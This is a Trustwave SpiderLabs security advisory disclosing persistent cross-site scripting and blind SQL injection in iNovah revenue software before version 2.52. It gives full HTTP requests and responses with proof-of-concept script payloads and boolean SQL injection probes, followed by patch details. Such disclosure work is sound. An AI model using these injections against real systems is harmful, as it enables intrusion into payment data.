Trustwave SpiderLabs Security Advisory TWSL2016-002:
Multiple Vulnerabilities in iNovah

Published: 02/18/2016 
Version: 1.0

Vendor:	System innovators (http://systeminnovators.com)
Product: iNovah
Version affected: prior to 2.52

Product description:
iNovah is a PCI PA-DSS validated end-to-end revenue management solution that 
streamlines enterprise revenue collection from multiple source systems.

Finding 1: Persistent Cross-Site Scripting in multiple locations
*****Credit: Christiaan Esterhuizen of Trustwave (example 1 and 2)
*****Credit: Mateusz Wiśniewski of Trustwave (example 3)

iNovah does not properly validate some of the user input parameters sent in 
POST requests. It was possible to inject either unicode or URL encoded 
JavaScript to some of the parameters which was then stored on the server.

Example 1:

Request containing the unicode encoded POC injected using the 
ctl00_mainContent_consDepSectionPanel_description_clientState parameter:

POST /iNovah2/Balancing/EditConsolidatedDeposit.aspx HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://a.b.c.d/iNovah2/Balancing/EditConsolidatedDeposit.aspx
Cookie: ASP.NET_SessionId=czqfbq55y3ejyhnei5vtmnug
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78555
Proxy-Connection: Keep-Alive

[Snipped]
ctl00_mainContent_consDepSectionPanel_referenceNumber=12121212
&ctl00_mainContent_consDepSectionPanel_description_clientState=%7C0%7C01test%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D%5D%2C%5B%7B%7D%2C
%5B%5D%5D%2C%2201test%uff1cimg+src%3dx+onerror%3dalert(1)%uff1e%22%5D&ctl00_mainContent_consDepSectionPanel_description=test&
ctl00%24mainContent%24availBatchDepSectionPanel%24batchDateDropDown%24dropDown=-89
[Snipped]

The code is retrieved in the GET request:

GET /iNovah2/Query/BrowseAudit.aspx HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=czqfbq55y3ejyhnei5vtmnug
Connection: Keep-Alive
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Wed, 30 Sep 2015 13:08:02 GMT
Content-Length: 424459

[...]

<td>admin-pentest1</td><td>General</td><td class="AuditTextDisplay">
Consolidated deposit created.<br /><br />User: ***********<br />Deposit date: 9/30/2015<br />
Deposit ID: 56<br />Bank ID: WFCC<br />Reference #: 12121212<br />Description: test<img src=x onerror=alert(1)><br />

[...]

Example 2:

Request containing the unicode encoded POC injected using the ctl00$mainContent$exportPanel$txtDescription parameter:

POST /iNovah2/Export/ExportCreate.aspx?exportId=62&mode=add HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://a.b.c.d/iNovah2/Export/ExportCreate.aspx?exportId=62&mode=add
Cookie: ASP.NET_SessionId=hbzddi3zvqe1pz55mwhfwnik
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 368418
Proxy-Connection: Keep-Alive

[Snipped]&
ctl00%24mainContent%24exportPanel%24txtDescription=pentest%uff1cimg+src=x+onerror=alert('XSS')%uff1e&ctl00%24mainContent%24exportPanel%24UseStatus=on
[Snipped]


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /iNovah2/Export/ExportResults.aspx?ExportID=63
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Wed, 23 Sep 2015 10:51:45 GMT
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fiNovah2%2fExport%2fExportResults.aspx%3fExportID%3d63">here</a>.</h2>
</body></html>


The JavaScript would be reflected when following the below GET request:

GET /iNovah2/Export/RunExport.aspx HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://a.b.c.d/iNovah2/Export/ExportResults.aspx
Cookie: ASP.NET_SessionId=hbzddi3zvqe1pz55mwhfwnik
Connection: Keep-Alive
Proxy-Connection: Keep-Alive
Authorization: NTLM [...]

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Wed, 23 Sep 2015 10:53:48 GMT
Content-Length: 163995

[...]

<td onclick="window.location='ExportResults.aspx?ExportID=63'">
<img style="display:none;" src="" alt="00002 (XML)" />
<span class="LinkTitle">
00002 (XML)</span><span class="LinkDescription">
pentest<img src=x onerror=alert('XSS')></span>
</td>

[...]

Example 3:

Raw HTML tags injected into printer name:

POST /inovah2/Default.aspx HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=11u4gi55t5ibvmzzljkvmzff
Connection: Keep-Alive
Proxy-Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

__EVENTTARGET=ctl00_localPrinterLink&__EVENTARGUMENT=A776<script>alert(5)</script>

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Fri, 25 Sep 2015 08:10:27 GMT
Content-Length: 199405

[...]

The code is then reflected on the main site:

GET /inovah2/Default.aspx HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ASP.NET_SessionId=11u4gi55t5ibvmzzljkvmzff
Connection: Keep-Alive
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Fri, 25 Sep 2015 08:13:48 GMT
Content-Length: 198750

[...]

<div style="float: right">
<span id="ctl00_userNameInfo"><b>User:</b> *********</span>
<span id="ctl00_serverNameInfo"><br/></span>
<a id="ctl00_localPrinterLink" href="javascript:changeLocalPrinterDialog();">Local Printer: A776<script>alert(5)</script></a>
</div>

[...]


Finding 2: Blind SQL Injection in FindPayments.aspx via administrative account
*****Credit: Christiaan Esterhuizen of Trustwave

There is a find payments functionality in the application that is available for 
an administrative account.
It was possible to injest SQL syntax statements in one of the parameters sent 
to the server: "ctl00_mainContent_criteriaSectionPanel_accountNumberEditor_clientState". 
Although these are only basic examples of the injection it was possible to use 
the injection point to successfully extract data from the backend database.

Request:

POST /iNovah2/Query/FindPayments.aspx HTTP/1.1
Content-Length: 76030
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Host: a.b.c.d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0
Connection: Keep-Alive
Referer: https://127.0.0.1/iNovah2/Query/FindPayments.aspx
Cookie: ASP.NET_SessionId=basuntzv5x41js45tmen3e55
Content-Type: application/x-www-form-urlencoded

[Snipped]
ctl00_mainContent_criteriaSectionPanel_accountNumberEditor_clientState=%7C0%7C011234%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D%5D%2C%5B%7B%7D
%2C%5B%5D%5D%2C%22011234-9374[Inejection Point]%22%5D&ctl00_mainContent_criteriaSectionPanel_accountNumberEditor=1234&
ctl00_mainContent_criteriaSectionPanel_customerNumberEditor_clientState=%7C0%7C01%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D%5D%2C%5B%7B%7D%2C%5B%5D
%5D%2C%2201%22%5D&ctl00_mainContent_criteriaSectionPanel_customerNumberEditor=
[Snipped]

Example 1:

Injecting a statement that would validate to "True" (' OR 'a'='a):

POST /iNovah2/Query/FindPayments.aspx HTTP/1.1
Content-Length: 76030
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Host: a.b.c.d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0
Connection: Keep-Alive
Referer: https://127.0.0.1/iNovah2/Query/FindPayments.aspx
Cookie: ASP.NET_SessionId=basuntzv5x41js45tmen3e55
Content-Type: application/x-www-form-urlencoded

[Snipped]
ctl00_mainContent_criteriaSectionPanel_accountNumberEditor_clientState=%7C0%7C011234%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D%5D%2C%5B%7B%7D
%2C%5B%5D%5D%2C%22011234-9374'+OR+'a'='a%22%5D&ctl00_mainContent_criteriaSectionPanel_accountNumberEditor=1234&
ctl00_mainContent_criteriaSectionPanel_customerNumberEditor_clientState=%7C0%7C01%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D%5D%2C%5B%7B%7D%2C%5B%5D
%5D%2C%2201%22%5D&ctl00_mainContent_criteriaSectionPanel_customerNumberEditor=
[Snipped]

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Thu, 24 Sep 2015 10:30:22 GMT
Content-Length: 1547776

[...]

</div><div class="__secpantfTextFrame">Find Results (2,000 payments)</div>

[...]

Example 2:

Injecting a statement that would validate to "False" (' OR 'a'='b):

POST /iNovah2/Query/FindPayments.aspx HTTP/1.1
Content-Length: 75996
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Host: a.b.c.d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0
Connection: Keep-Alive
Referer: https://127.0.0.1/iNovah2/Query/FindPayments.aspx
Cookie: ASP.NET_SessionId=basuntzv5x41js45tmen3e55
Content-Type: application/x-www-form-urlencoded

[Snipped]
ctl00_mainContent_criteriaSectionPanel_accountNumberEditor_clientState=%7C0%7C011234%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B
%5D%5D%2C%5B%7B%7D%2C%5B%5D%5D%2C%22011234-9374'+OR+'a'='b%22%5D&ctl00_mainContent_criteriaSectionPanel_accountNumberEditor=1234
&ctl00_mainContent_criteriaSectionPanel_customerNumberEditor_clientState=%7C0%7C01%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D
%5D%2C%5B%7B%7D%2C%5B%5D%5D%2C%2201%22%5D&ctl00_mainContent_criteriaSectionPanel_customerNumberEditor=
[Snipped]

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Thu, 24 Sep 2015 10:36:58 GMT
Content-Length: 218810

[...]

</div><div class="__secpantfTextFrame">Find Results (0 payments)</div>

[...]


Remediation Steps:
Apply the 2.52 update or the latest stable version of the iNovah software.  
Please note that Trustwave SpiderLabs have not verified this fix.

Revision History:
11/19/2015 - Vulnerability disclosed
01/29/2016 - Patch released by vendor
02/18/2016 - Advisory published


About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security 
risk. With cloud and managed security services, integrated technologies and a 
team of security experts, ethical hackers and researchers, Trustwave enables 
businesses to transform the way they manage their information security and 
compliance programs. More than three million businesses are enrolled in the 
Trustwave TrustKeeper cloud platform, through which Trustwave delivers 
automated, efficient and cost-effective threat, vulnerability and compliance 
management. Trustwave is headquartered in Chicago, with customers in 96 
countries. For more information about Trustwave, visit 
https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.